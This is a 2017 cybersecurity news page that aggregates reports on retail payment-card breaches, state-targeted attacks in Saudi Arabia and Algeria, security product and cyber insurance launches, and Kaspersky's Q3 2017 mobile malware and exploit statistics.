- Cyber -

Last update 09.10.2017 12:44:39

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6

Bulletproof Coffee Failed to Keep Hackers Out
28.11.2017 securityweek Cyber
Bulletproof 360, the Bellevue, Wash.-based company that offers Bulletproof coffee and dietary supplements, is having trouble keeping cybercriminals out of its systems. The firm has sent out several notifications in the past year informing customers that hackers may have obtained their personal and payment card information.

Bulletproof only has three physical stores in Seattle and Los Angeles, but many people buy the company’s products from its website, which appears to have been breached several times in the past year.

The company first discovered that hackers had broken into its website on February 23, 2017. An investigation revealed that cybercriminals had compromised Bulletproof’s e-commerce system and they may have obtained payment card data submitted by users who had made online purchases, including names, card numbers, expiration dates, and CVVs. The exposed data also included email addresses, physical addresses and phone numbers.

An initial investigation found that the hackers had access to Bulletproof’s systems from October 26, 2016 until January 31, 2017. However, the final forensics report revealed that the attackers actually had access until May 30, 2017, which triggered a second breach notification for the period between February and May 2017.

Bulletproof then initiated another internal investigation, which showed that hackers had compromised the checkout page on its website, bulletproof.com, in an effort to capture payment card data submitted by customers making online purchases. This time, the attackers appeared to have had access between August 28, 2017 and September 5, 2017.

In the notifications sent out on September 15, the company told customers that it had “implemented enhanced security measures, including installing a new website security platform, implementing a security information and event management system (SIEM), and implementing enhanced logging” in an effort to prevent future incidents.

However, the new security measures did not help much and this week Bulletproof started sending out a new round of data breach notifications. It turns out that cybercriminals may have also intercepted information submitted to the company via the checkout page on its website between May 20 and October 13, 2017, and October 15-19, 2017.

The company has promised to reimburse affected customers for costs incurred as a result of these breaches if their financial institution refuses to reimburse them. It remains to be seen if this is the last breach notice sent out by the company or if hackers will gain access to its systems once again – if they haven’t done so already.

UPDATE. Bulletproof has sent SecurityWeek the following statement:

We became aware of a security incident involving our ecommerce website after noticing unusual activity relating to customer online transactions. We then began an immediate investigation of our website, engaged three computer security firms to examine our systems for any signs of an issue, and notified law enforcement. Our investigation earlier determined that an unknown third party had compromised our e-commerce system, potentially affecting customer payment card information used for online transactions on Bulletproof’s e-commerce website from October 26, 2016 to May 30, 2017. Working with the security firms, we recently determined that payment card information used on our ecommerce website from October 26, 2016 through October 13, 2017 and from October 15-19, 2017 may have been compromised. We immediately removed the code and have notified potentially affected customers of the incident.

Protecting our customers’ information remains a top priority and we regret any inconvenience or concern this may cause our customers. We recognize the importance of protecting our customers’ payment card information. We are continuing to work with the three security firms to implement enhanced security measures to try to prevent a similar incident from happening in the future.

Artificial Intelligence is Important for Cybersecurity, But It’s Not Enough
24.11.2017 securityaffairs Cyber

The advent of Artificial Intelligence has brought with it a new scope for cybersecurity. Why the artificial intelligence is important for cybersecurity?
In my last blog, I discussed AI and Big Data. Now, I am going to explain about AI and Cybersecurity.

The advent of Artificial Intelligence has brought with it a new scope for cybersecurity. After all, an intelligent security system is expected to overcome any sophisticated threats. However, many security experts believe that AI is a double-edged sword and hence it could become dangerous at an epic level if it gets into the wrong hands. Let us make a quick analysis on the unison between cybersecurity and AI.

Cybersecurity is the need of the day. As if we didn’t have enough to worry about with terrorists running wild – always looking to inflict damage – we now have to worry about Cybercriminals as well. And in many cases, they can be a lot more dangerous than your average terrorist.

The significance of having a perfect cybersecurity strategy or solution has grown over the years. All the credit goes to the proliferation of smart devices on the Internet. Also, because of the growing endpoints that are always connected to the cyberspace, cybercriminals now have a plethora of opportunities to infiltrate devices.

Artificial Intelligence

Not only do hackers have more entry points to breach, but they also have more sophisticated tools to penetrate even into highly-secured devices or networks. How are they doing it? By mass producing sophisticated malware.

According to the 22nd threat report by Symantec, it is found that over 300 million malware were detected in 2016 alone. Not only this! John – the contributor at thebestvpn, shared the shocking statistic that one in every 131 emails contains a malware. The massive figure presents quite a shocking blow to businesses who then rush to come up with a more potent cybersecurity solution.

Moreover, we can’t ignore the fact that with the passage of time, cybercriminals have become smarter and more adept at countering traditional security practices. A survey conducted in 2017 of 70 professional hackers and pen testers found that 60% of hackers claim they can compromise a system within just 6 hours. Plus, over 80% of the hackers and testers said they could remain hidden from the network for 100 days after stealing sensitive data.

To combat such threats, we need to come up with a disruptive security technology that is not only efficient, but also proactive, faster and more intelligent. One such disruption that can prove itself an ideal security solution is Artificial Intelligence (AI).

Artificial Intelligence & Cybersecurity: A Perfect Unison or a Calamity

When we talk about Artificial Intelligence, the first thing that pops into our mind are technologies like Tesla’s self-driving cars or the Amazon Echo. This is because we take AI only as a “Buzzword” and nothing else.

Regardless, AI can offer more firepower when it comes to cybersecurity. It can cover the lack of manpower that we see in this highly complex field. Likewise, it can run things faster and hence detect threats before they could compromise a system and inflict damage.

Although there is a lot of potential in Artificial Intelligence for tackling complex cyber threats for good, there are some aspects that make it a double-edged sword. Before we move on to the other aspects of AI, let’s take a look at why it seems to be a great cybersecurity tool.

The Significance of AI as a Security Solution

IT experts at a company have a lot on their hands to monitor and analyze. They are always challenged with sifting through loads of security logs and activities, finding security threats that could pose a serious threat and coming up with mitigation strategies to contain it.

Moreover, there are weeks and months of logs that need to be scrutinized and vetted for security purposes. Identifying any abnormality in such vast amount of data and then formulating the right solution require not only more manpower but also more tools and resources.

However, an AI-powered machine can greatly assist IT personnel in monitoring, tracking and detecting anomalies efficiently.

Ryan Permeh, Cylance Chief Scientist, said in an online interview conducted by CSOOnline, “Historically, an AV researcher might see 10,000 viruses in a career. Today there are over 700,000 per day.” He further states that his security firm uses AI to tackle such attacks.

Apart from that, AI as a security tool can help with the lack of manpower that the cybersecurity industry is currently facing. Over 40% of organizations claim that they suffer from a “problematic shortage” of talent in cybersecurity.

Shahid Shah, the CEO of Netspective Communications, claims that there is a lot of skill shortage in different cybersecurity areas such as advanced malware prevention, compliance, IDS/IPS, identity and access management, etc.

Shah further states that by implementing AI, security firms can depend on “computers to do the grunt work and leave humans to the decision-making.”

Why AI Currently Isn’t a ‘Perfect’ Cybersecurity Solution

If AI can be used to shield our systems or networks from cyber-attacks, it is rational to expect the technology being used for more attacks. Shortly, when AI becomes more automated and developed, we might see more sophisticated cyber-attacks carried out by intelligent malware or viruses.

In fact, Endgame’s security expert, Hyrum Anderson has proved just that at the DEF CON 2017. The team demonstrated an intelligent application that can re-engineer a malware and make it undetectable to even a smart antivirus. A group of researchers was successful in circumventing the protective layers of the AI-powered antivirus with its AI-powered malware 16% of the time.

The research was conducted to show that even AI can have blind spots that could be used to compromise systems.

The demonstration Hyrum Anderson presented isn’t the only research that indicates the negative implications of relying solely on AI. In fact, another research conducted by a security firm, Cylance, predicts AI “weaponization” soon.

According to the research, 62% of security experts believe that AI-powered cyber-attacks will increase in the near future, and hence the technology will be used as an intelligent cyber weapon.

“While AI may be the best hope for slowing the tide of cyberattacks and breaches, it may also create more advanced attacker tactics in the short-term,” says Cylance.

Final Say

AI-powered systems may reinforce our cybersecurity infrastructure, enabling our workforce to detect, contain, mitigate or stop cyber threats. However, relying solely on an intelligent technology that could be molded at our will can be dangerous. Plus, an AI-enabled attack may prove to be detrimental at an epidemic level.

Advanced cyber attack hits Saudi Arabia to disrupt government computers
24.11.2017 securityaffairs Cyber

Saudi Arabia announced to have detected an “advanced” cyber attack targeting the kingdom with the intent to disrupt government computers.
On Monday, Saudi authorities announced to have detected an “advanced” cyber attack targeting the kingdom. According to the experts at the Saudi National Cyber Security Centre, the attackers aimed to disrupt government computers.

The attackers leveraged the Powershell, but at the time of writing Government experts it did not comment on the source of the attack.

PowerShell is extremely powerful and that attackers are increasingly using it in their attack methods. PowerShell is a default package that comes with Microsoft Windows OS and hence it is readily available on the victim machines to exploit.

“Powershell is Predominantly used as a downloader”

The most prominent use of PowerShell, that is observed in the attacks in-the-wild, is to download the malicious file from the remote locations to the victim machine and execute it using commands like Start-Process, Invoke-Item OR Invoke-Expression (-IEX) file OR downloading the content of the remote file directly into the memory of the victim machine and execute it from there.

Back to the attacks that hit Saudi computers, the NCSC speculates the involvement of an APT that used spear phishing attacks to infiltrate computers in the Kingdom.

“The NCSC has detected a new Advanced Persistent Threat (APT) that is targeting Saudi Arabia,” the agency said in a statement.

Saudi Arabia was targeted several times by APT, the most clamorous attack was conducted with the Shamoon wiper in 2012 against computers in the Saudi energy sector in 2012.

Computers at Saudi Aramco, one of the world’s biggest oil companies, was disrupted by Shamoon in what is believed to be the country’s worst cyber attack yet.

In the attack against Saudi Aramco Shamoon wipe data on over 30,000 computers and rewrite the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The first team that discovered the malware was Kaspersky Lab that had analyzed some instances of the threat linked to the “wiper agent” due to the presence of a module of a string with a name that includes “wiper” as part of it.

Early this year, Saudi authorities warned of a new wave of attacks that leveraged the Shamoon 2 malware targeting the country.

In January, the Saudi Arabian labor ministry had been attacked and also a chemical firm reported a network disruption.

shamoon Saudi Arabia

According to security experts, the threat actor behind the Shamoon attacks was likely working on behalf of the Iranian government in 2012.

ERPScan Launches AI-Driven SAP Security Platform
22.11.2017 securityweek Cyber
ERPScan, a company that specializes in security solutions for SAP and Oracle enterprise resource planning (ERP) products, announced this week the launch of a new AI-driven cybersecurity platform for SAP systems.

The new product, ERPScan SMART Cybersecurity Platform for SAP, is designed to help organizations prevent, detect, and respond to threats targeting their SAP systems.

The platform’s assessment module allows security teams to identify vulnerabilities, custom code issues, misconfigurations, and segregation of duties (SoD) violations that could introduce risks. The prevention component enables employees to address issues and apply virtual patches.

The SMART Cybersecurity Platform for SAP includes modules for detecting malware and other malicious activity, and helps incident response teams quickly obtain information needed to contain a breach. The product also provides C-level executives and managers a comprehensive view of their organization’s security posture.

According to ERPScan, the platform leverages machine learning, specifically deep learning, to create a baseline for normal user behavior, which it then uses to detect potentially malicious activity carried out by both insiders and external entities.

The new platform combines the functionality of existing ERPScan SAP tools with machine learning and new modules for detection, response and monitoring.

“This solution is a real breakthrough for us,” said Alexander Polyakov, founder and CTO of ERPScan. “We spent the last two years on developing a solution that would be able to not only cover all areas of SAP cybersecurity, but also be intuitive by adding machine learning and adaptive interfaces. Our secret team of data scientists and machine learning experts battled with the experienced Research team and taught the system to detect advanced attacks and anomalous user behavior. Now we are ready to present the new generation of SAP cybersecurity products, and it's so exciting.”

Polyakov told SecurityWeek that the product is currently being tested by some early adopters, and expects it to become generally available in the second half of January 2018.

ERPScan has made significant contributions to improving SAP security, not only through its products, but also by informing the vendor of many vulnerabilities discovered by its researchers.

A massive cyber attack hit the Algerian state telecom operator Algerie Telecom
21.11.2017 securityaffairs Cyber

The Algerian state telecom operator Algerie Telecom was hit by a series of cyber attacks aimed to hack and disrupt its system.
The Algerian state telecom operator Algerie Telecom confirmed on Friday that it was hit by a series of cyber attacks aimed to hack and disrupt its system.

The company was able to repel the attack and security services managed to identify and arrest the attackers.

At the time of writing, there are no further details about the attacks or the motivation of the hackers.

According to a statement issued by the company, its staff was able to protect the operational infrastructure with the help of security services.

Algerian state telecom operator Algerie Telecom

The rapid increase in the number of cyber attacks is raising concerns in Algeria especially over the security of recently launched services, such as the recently adopted e-payment system for electricity and water bills.

“Iman Houda Faraoun, Minister of Post, Information and Communication Technologies and Digital Economy, said the e-commerce bill, which had been approved by the Council of Ministers, will come into force as soon as it is approved by the parliament.” reported the Xinhuanet.com website.

“She promised that the e-commerce process will be fully protected, as e-financial transactions data, invoices and postal and bank cards will remain confidential.”

New Cyber Insurance Firm Unites Insurance With Cyber Intelligence
17.11.2017 securityweek Cyber
Mountain View, Calif-based cyber insurance firm At-Bay has emerged from stealth with a mission to shake up the status quo in cyber insurance. It brings a new model of security cooperation between insured and insurer to reduce risk and exposure to both parties.

At-Bay has partnered with HSB to bring to market a product to insure and defend organizations against cyber risks. It has closed a $6 million seed funding round, led by LightSpeed Venture Partners, with the participation of Shlomo Kramer and LocalGlobe.

"We founded At-Bay with the belief that controlling for cyber risk enables businesses to embrace technology and unlock great value to customers," said Rotem Iram, CEO and founder, At-Bay. "We match deep insights on a company's IT security with financial exposure that cyber attack vectors create, to enable insurance brokers and risk managers to more clearly and accurately assess and manage cyber risk. Our insurance products and supporting risk management services provide organizations with the confidence that they can take on the challenges of tomorrow."

Organizations are increasingly digitizing their businesses and becoming more reliant on technology. Technology is not secure and presents risk. Much of that risk is mitigated by security technology -- but each day there is further proof that security technology is not perfect. Risk managers need to consider that despite all the security technology employed to mitigate risk, there will always be residual risk that is best handled by risk transfer; that is, cyber insurance. Cyber insurance can be seen as a complement to cybersecurity technology used together to more fully mitigate the increasing risk of insecure digitization.

The primary problem for cyber insurers is that there is no established historical corpus of understanding for cybersecurity risk in the same way as there is for, say, motor or life insurance. Insurance works best with static risk, but cyber risk is intrinsically dynamic -- both the target (the IT infrastructure) and the attack methodology (attackers, tools, techniques, exploits and motivation) are continuously changing. Neither the insurer nor the insured currently understands how cybersecurity can be insured. For example, a survey by At-bay indicates that 50% of companies that do not have cyber insurance say it is because they do not know enough about cyber insurance.

At-bay proposes to solve this dilemma by uniting cybersecurity understanding with cyber insurance delivery within one supplier. At-bay's Rotem Iram points out that insurers have two advantages in this process. Firstly they are on the hook to pay out in case of loss; and secondly, as they develop their customer base, they become privy to a vast amount of information on cybersecurity and risk. The first provides the incentive for insurers to learn from the second, provided they have sufficient in-house understanding of cybersecurity threats, mitigations and response.

One of the problems for insurers is that each client's risk profile is continuously and unpredictably changing. "A rate could be set for a perceived risk; but two months later the NSA loses EternalBlue and the risk level changes," explains Iram. "The insurer cannot increase the premiums because its not the insured's fault -- so he has to carry that increased risk at the same premium for another ten months. But if the insurer has sufficient understanding of the security posture of the client, he can tell the client about the new risk and how to mitigate it."

The interesting part about this example is that Iram would still pay out on the insurance even if he warned a company about a new risk and the company did nothing about it -- and was subsequently affected. "Yes, 100%," he told SecurityWeek. He accepts that he may be being a little naive, but firmly believes the future for cyber insurance is the evolution of a mutually collaborative relationship between insurer and insured. If the insurer gives good advice, and the insured responds, the insurer could give an end-of-year rebate.

Key to that collaboration is that the insured must trust the cybersecurity knowledge of the cybersecurity insurer. This is what has been lacking and is precisely what At-Bay seeks to bring to the table. Iram himself comes from a security background, and even spent five years with the Israel Defence Forces where he became head of the techno-intelligence group. He believes that if the insurer can demonstrate that it gives good advice, the insured will respond. "Nobody wants to get hacked. There's always a cost. There will always be some aspects that aren't or cannot be covered by insurance." Insurance is about reducing financial exposure as far as possible, not about eliminating it -- it cannot, for example, insure against loss of revenue caused by brand reputation damage (think Target), or loss of share value (think Equifax).

"We will be collecting data and using researchers to push the limits of our understanding of risk," he told SecurityWeek. "As we do that, we will be improving the quality of our product. Product quality is depressed today because insurance companies do not really understand the cybersecurity risk.

"Our team," he continued, "is split between Mountain View and Tel Aviv. Tel Aviv is where we have access to incredible security talent from the intelligence community. What we've built is a nation-state level reconnaissance capability based on what we've brought from the intelligence community. Our team and machine gathers intelligence from different sources, contextualizes it, and relates it to the customer infrastructure. Long story short, we scan the entire market of publicly available resources every month. Whenever we underwrite a company we have a history of how their technology stack and their security stack has looked and evolved over a period of time. This is a good part of the underwriting process, and helps us offer really good security advice to our clients."

The Equifax breach is an example of how this model would work. Rather than sit back and wait for the breach that would trigger an insurance claim, At-Bay would detect and inform any client with an unpatched vulnerability (such as the Struts vulnerability at Equifax) and explain how it should be remediated.

If At-Bay succeeds in its model of uniting security intelligence with insurance, it could shake up the entire cyber insurance market. If it does that, then both cybersecurity vendors and technology companies will need to look at their existing own third-party liability insurance. If more companies adopt cyber insurance, then more cybersecurity insurers will start trying to claw back their payouts from third parties who may be deemed to have been at fault in the breach.

Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.

IT threat evolution Q3 2017. Statistics
12.11.2017 Kaspersky Analysis  Cyber
According to KSN data, Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.

72,012,219 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.

Crypto ransomware attacks were blocked on 186283 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,598,196 malicious installation packages;
19,748 mobile banking Trojans (installation packages);
108,073 mobile ransomware Trojans (installation packages).
Mobile threats
Q3 events
The spread of the Asacub banker
In the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.

Number of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017

New capabilities of mobile banking Trojans
Q3 2017 saw two significant events in the world of mobile banking Trojans.

Firstly, the family of mobile banking Trojans Svpeng has acquired the new modification Trojan-Banker.AndroidOS.Svpeng.ae capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.

Interestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related – instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.

Trojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand

Secondly, the FakeToken family of mobile banking Trojans has expanded the list of apps it attacks. If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.

The growth of WAP billing subscriptions
In the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to steal users’ money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user’s knowledge.

Our Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.

Mobile threat statistics
In the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.

Number of detected malicious installation packages (Q4 2016 – Q3 2017)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q2 and Q3 2017)

RiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.

Trojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.

The share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% – almost 4 p.p. less than in Q2.

In Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.

TOP 20 mobile malware programs
Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Verdict % of attacked users*
1 DangerousObject.Multi.Generic 67.14
2 Trojan.AndroidOS.Boogr.gsh 7.52
3 Trojan.AndroidOS.Hiddad.ax 4.56
4 Trojan-Dropper.AndroidOS.Agent.hb 2.96
5 Trojan.AndroidOS.Loapi.b 2.91
6 Trojan-Dropper.AndroidOS.Hqwar.i 2.59
7 Trojan-Clicker.AndroidOS.Ubsod.b 2.20
8 Backdoor.AndroidOS.Ztorg.c 2.09
9 Trojan.AndroidOS.Agent.gp 2.05
10 Trojan.AndroidOS.Sivu.c 1.98
11 Trojan.AndroidOS.Hiddapp.u 1.87
12 Backdoor.AndroidOS.Ztorg.a 1.68
13 Trojan.AndroidOS.Agent.ou 1.63
14 Trojan.AndroidOS.Triada.dl 1.57
15 Trojan-Ransom.AndroidOS.Zebt.a 1.57
16 Trojan-Dropper.AndroidOS.Hqwar.gen 1.53
17 Trojan.AndroidOS.Hiddad.an 1.48
18 Trojan.AndroidOS.Hiddad.ci 1.47
19 Trojan-Banker.AndroidOS.Asacub.ar 1.41
20 Trojan.AndroidOS.Agent.eb 1.29
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.

As in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.

Trojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.

Trojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loaipi family. One of them –Trojan.AndroidOS.Loapi.b – came fifth in this quarter’s Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals’ server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.

Trojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the FakeToken and Svpeng mobile banking families.

In seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our review of Trojans that steal money using WAP subscriptions.

Trojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them ‘hide’ in the system folder, making it very difficult to remove them. It’s worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).

Trojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.

Occupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.

Trojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main ‘audience’ is in Russia.

The geography of mobile threats

The geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):

Country* % of attacked users**
1 Iran 35.12
2 Bangladesh 28.30
3 China 27.38
4 Côte d’Ivoire 26.22
5 Algeria 24.78
6 Nigeria 23.76
7 Indonesia 22.29
8 India 21.91
9 Nepal 20.78
10 Kenya 20.43
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

For the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.

Russia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.

The safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).

Mobile banking Trojans
Over the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)

Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.

Geography of mobile banking threats in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):

Country* % of attacked users**
1 Russia 1.20
2 Uzbekistan 0.40
3 Kazakhstan 0.36
4 Tajikistan 0.35
5 Turkey 0.34
6 Moldova 0.31
7 Ukraine 0.29
8 Kyrgyzstan 0.27
9 Belarus 0.26
10 Latvia 0.23
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.

Of particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn’t make it into our Top 10 this quarter. This was due to a decrease in activity by the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher mobile banking families.

Mobile ransomware
In Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)

In our report for Q2, we wrote that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family’s activity.

Trojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, Trojan-Ransom.AndroidOS.Fusob.h, which topped the rating for several quarters in a row, was only third in Q3 2017.

Geography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):

1 US 1.03%
2 Mexico 0.91%
3 Belgium 0.85%
4 Kazakhstan 0.79%
5 Romania 0.70%
6 Italy 0.50%
7 China 0.49%
8 Poland 0.49%
9 Austria 0.45%
10 Spain 0.33%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.

In Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.

Vulnerable apps exploited by cybercriminals
Q3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message – in case the embedded exploit fails.

Although two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.

There were no large network attacks (such as WannaCry or ExPetr) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.

Distribution of exploits used in attacks by type of application attacked, Q3 2017

